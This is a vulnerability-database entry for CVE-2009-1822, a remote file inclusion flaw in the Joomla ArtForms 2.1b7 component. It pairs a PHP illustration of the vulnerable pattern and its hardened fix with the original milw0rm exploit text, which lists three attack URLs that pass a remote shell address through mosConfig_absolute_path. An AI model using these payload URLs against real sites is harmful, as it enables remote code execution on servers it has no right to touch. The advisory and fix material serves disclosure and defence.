Joomla! InterJoomla ArtForms Component Remote File Code Injection Vulnerability

Vulnerability ID: 1117784    Vulnerability type: Code injection
Published: 2009-05-15    Updated: 2009-06-01
CVE ID: CVE-2009-1822    CNNVD ID: CNNVD-200905-341
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/8697
https://cxsecurity.com/issue/WLB-2009060081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-341
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in version 2.1b7 of the Joomla! InterJoomla ArtForms (com_artforms) component. A remote attacker can execute arbitrary PHP code by supplying a URL in the mosConfig_absolute_path parameter to (1) imgcaptcha.php or (2) mp3captcha.php in assets/captcha/includes/captchaform/, or (3) assets/captcha/includes/captchatalk/swfmovie.php.
|Vulnerability EXP
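The bug class behind this record is a file path assembled from a request-controlled variable. The following is an added illustration, not the ArtForms source: the vulnerable pattern as it would be spotted in code review, beside a hardened form that assumes Joomla 1.5's `_JEXEC` guard and `JPATH_ROOT` constant.

```php
<?php
// Constructed example of the RFI pattern in this advisory; NOT code from com_artforms.
// In 2009, register_globals=On let ?mosConfig_absolute_path=<url> populate the global
// directly, and allow_url_include=On let include() fetch and execute that URL.

/* ---- Vulnerable pattern (what to look for in review) ---- */
function vulnerable_include()
{
    global $mosConfig_absolute_path;                   // may originate from the query string
    include $mosConfig_absolute_path . '/configuration.php';
}

/* ---- Hardened pattern ---- */
// 1. Refuse stand-alone HTTP access: Joomla defines _JEXEC only when a file is loaded
//    through the framework, so a direct request to the script stops here.
defined('_JEXEC') or die('Restricted access');

// 2. Never build an include path from request data; use the framework constant and,
//    as defence in depth, verify the resolved target is a real file under the site root.
function safe_include(string $relative): bool
{
    $base   = realpath(JPATH_ROOT);
    $target = realpath($base . '/' . $relative);       // realpath() returns false for http://, ftp://, etc.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                                  // outside the root, a URL wrapper, or missing
    }
    include $target;
    return true;
}
```

Server-side, the same class of flaw is blunted by `allow_url_include=Off` and `register_globals=Off` in php.ini, but the code-level fix above does not depend on those settings.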
ArtForms 2.1b7 remote file includes
 
From Turkey
iskorpitx (He is a world brand, can never be imitated)
 
// swfmovie.php - swf output and config
 
/* output captcha image */
 
/* output captcha mp3 */
 
----------------------------------------------------------------------------------
 
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org

# milw0rm.com [2009-05-15]
|References

Source: BID
Name: 34986
Link: http://www.securityfocus.com/bid/34986
Source: MILW0RM
Name: 8697
Link: http://www.milw0rm.com/exploits/8697